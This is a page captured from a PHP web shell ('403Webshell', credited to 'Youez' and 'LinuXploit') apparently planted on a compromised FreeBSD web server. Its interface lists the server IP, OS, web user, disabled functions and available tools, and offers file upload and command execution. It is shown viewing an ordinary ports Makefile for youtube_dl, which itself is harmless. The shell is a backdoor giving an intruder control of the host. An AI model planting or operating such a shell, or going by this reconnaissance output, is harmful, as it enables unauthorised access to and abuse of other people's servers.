403Webshell
Server IP : 82.208.35.60  /  Your IP : 216.73.216.89
Web Server : Apache/2.4.55 (FreeBSD) OpenSSL/1.1.1q-freebsd PHP/7.3.31
System : FreeBSD server7.d2m.cz 12.4-RELEASE-p9 FreeBSD 12.4-RELEASE-p9 GENERIC amd64
User : studiokobylisy_cz ( 1008)
PHP Version : 7.3.31
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /usr/ports/www/youtube_dl/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /usr/ports/www/youtube_dl/Makefile
PORTNAME=	youtube_dl
DISTVERSION=	2021.12.17
CATEGORIES=	www
MASTER_SITES=	https://github.com/ytdl-org/youtube-dl/releases/download/${DISTVERSION}/ \
		https://yt-dl.org/downloads/${DISTVERSION}/
DISTNAME=	youtube-dl-${DISTVERSION}

# Implicit approval to commit trivial version updates.
MAINTAINER=	multimedia@FreeBSD.org
COMMENT=	Program for downloading videos from various services
WWW=		https://yt-dl.org/

LICENSE=	UNLICENSE
LICENSE_FILE=	${WRKSRC}/LICENSE

USES=		gmake python

MAKE_ARGS=	PYTHON=${PYTHON_CMD}
ALL_TARGET=	youtube-dl
NO_ARCH=	yes
WRKSRC=		${WRKDIR}/youtube-dl

PLIST_FILES=	bin/youtube-dl \
		etc/bash_completion.d/youtube-dl.sh \
		man/man1/youtube-dl.1.gz \
		share/fish/vendor_completions.d/youtube-dl.fish \
		share/zsh/site-functions/_youtube-dl

OPTIONS_DEFINE=		FFMPEG RTMPDUMP
OPTIONS_DEFAULT=	RTMPDUMP

RTMPDUMP_DESC=	Use rtmpdump to download rtmp video streams

FFMPEG_RUN_DEPENDS=	ffprobe:multimedia/ffmpeg
RTMPDUMP_RUN_DEPENDS=	rtmpdump:multimedia/rtmpdump

post-extract:
# remove tarball provided version, build our own
	@${RM} ${WRKSRC}/youtube-dl

.include <bsd.port.mk>

Youez - 2016 - github.com/yon3zu
LinuXploit